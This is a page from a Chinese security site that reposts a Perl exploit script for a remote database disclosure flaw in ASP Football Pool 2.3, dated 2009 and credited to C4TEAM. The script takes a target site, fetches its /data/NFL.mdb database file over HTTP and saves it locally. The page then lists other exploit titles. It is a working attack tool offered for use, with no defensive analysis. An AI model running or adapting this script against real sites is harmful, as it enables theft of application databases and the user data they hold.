首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ASP Football Pool 2.3 Remote Database Disclosure Vulnerability
来源:WWW.C4TEAM.ORG 作者:ByALBAYX 发布时间:2009-06-02  

#!/usr/bin/perl
#
#
#ASP Football Pool v2.3
#
#Script    : ASP Football Pool v2.3
#
#Demo      : http://brainjar.com/AspFootballPool/demo1
#
#Download  : http://www.brainjar.com/AspFootballPool/download/AspFootballPool_2.3.zip
#
#              _.--"""""--._
#            .'             '.
#           /                 \
#          ;       C4TEAM      ;
#          |                   |
#          |                   |
#          ;                   ;                   ByALBAYX
#           \ (`'--,    ,--'`) /
#            \ \  _ )  ( _  / /                 WWW.C4TEAM.ORG
#             ) )(')/  \(')( (
#            (_ `""` /\ `""` _)
#             \`"-, /  \ ,-"`/                      
#              `\ / `""` \ /`
#               |/\/\/\/\/\|                     
#               |\        /|
#               ; |/\/\/\| ;
#                \`-`--`-`/
#                 \      /
#                  ',__,'
#
#
#ASP Football Pool v2.3 Remote Database Disclosure Exploit
#
#Exploited ByALBAYX
##########
#


use lwp::UserAgent;

system('cls');
system('title ASP Football Pool v2.3 Database Disclosure Exploit');
system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n    exploit.pl http://site.com\n";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n[-] ASP Football Pool v2.3 Database Disclosure Exploit\n";
print "[-]Exploited ByALBAYX \n\n\n";
print "[!] Exploiting $site ....\n";
my $site      = $ARGV[0] ;
my $target    = $site."/data/NFL.mdb" ;
my $useragent = LWP::UserAgent->new();
my $request   = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Kaydedildi! Git= c:/db.mdb";exit();}
else {print "[!] Exploit $site Failed !\n[!] ".$request->status_line."\n";exit();}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 Bind ASM Code Linux
·The Linksys WAG54G2 web manage
·Apache mod_dav / svn Remote De
·Apple iTunes 8.1.1 (ITMS) Mult
·Unclassified NewsBoard 1.6.4 M
·Atomix Virtual Dj Pro 6.0 Stac
·Roxio CinePlayer 3.2 (IAManage
·Podcast Generator <= 1.2 unaut
·RadCLASSIFIEDS Gold v2 (seller
·Joomla Component Seminar 1.28
·EXPLOIT Online Grades & Attend
·OpenSSL < 0.9.8i DTLS ChangeCi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved